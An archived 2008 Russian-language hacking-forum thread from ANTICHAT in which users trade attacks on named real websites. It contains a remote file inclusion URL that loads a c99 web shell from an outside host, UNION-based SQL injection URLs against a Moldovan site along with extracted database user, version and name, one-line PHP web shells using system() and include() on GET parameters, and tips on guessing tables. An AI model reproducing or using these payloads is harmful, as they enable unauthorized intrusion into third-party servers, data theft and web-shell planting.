ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
23.04.2008, 13:35
|
|
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме:
1608606
Репутация:
105
|
|
это уязвимость нзвается инклудом ч/з него иногда можно лит web-shell, вот юзай, например, это шелл, http://www.kat.kg/index.php?file=http://madnet.name/files/download/9_c99madshell.php
|
|
|
23.04.2008, 13:55
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
http://www.moldagrotehnica.md/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,database( ),user(),version()),0x71),0x71),6,7/*
что можно ещё нарыть ?
|
|
|
|
23.04.2008, 14:19
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
nicusor
Там восемь столбцов
_http://www.moldagrotehnica.md/index.php?newsid=-66+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat (user(),char(58),version(),char(58),database()),0x 71),0x71),4,5,6,7,8/*
agro@localhost:4.1.14:moldagrotehnica_md
Подбирай таблицы если надо
Последний раз редактировалось jokester; 23.04.2008 в 18:08..
|
|
|
|
23.04.2008, 17:27
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
Провел на форуме:
1357043
Репутация:
137
|
|
там 7 столбцов 100% ..
как подбирать ?
http://www.moldagrotehnica.md/index.php?newsid=9999999999999+UNION+SELECT+1,2,3, 4,5,6,7+from+<table>/* где <table> самые распространенные имена, правильно? |
|
|
|
23.04.2008, 17:48
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
nicusor, правильно. Есть ещё такая штука - посимвольный подбор.
|
|
|
|
23.04.2008, 18:08
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
nicusor
Друг мой. Интересно зачем задавать вопрос, если не слушать ответа на него?
Специально для тебя я привёл ссылку , пройдя по которой ты увидишь вывод из таблицы
Правда в моей ссылке(как впрочем и в базе) полей 8 и если ты догадаешься убрать из неё пробелы будет гораздо проще
Последний раз редактировалось jokester; 23.04.2008 в 18:44..
|
|
|
|
23.04.2008, 18:25
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Пробывал залить шелл на этот сайт. Почему пишет Warning: system() [function.system]: Cannot execute a blank command in http://site.com/script.php on line 1
В скрипте обычный вызов функции систем().Пробывал с кавычками и без них)
<?php system($_GET['cmd']); ?>
|
|
|
|
23.04.2008, 18:26
|
|
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
Провел на форуме:
2052669
Репутация:
178
|
|
это значит system отключено, юзай include
|
|
|
|
23.04.2008, 18:28
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756
Репутация:
2032
|
|
Сообщение от GrAmOzEkA
это значит system отключено, юзай include
это значит, что нужно писать
<?php @system($_GET['cmd']); ?>
|
|
|
|
23.04.2008, 18:31
|
|
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
Провел на форуме:
2052669
Репутация:
178
|
|
это значит, что нужно писать
имхо include удобнее =), да систем почти всегда отключен.
<?php include($_GET['cmd']); ?>
www.site.com/index.php?cmd=http://shell.ru/shell.txt
|
|
|
|
|
 |
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Комбинированный вид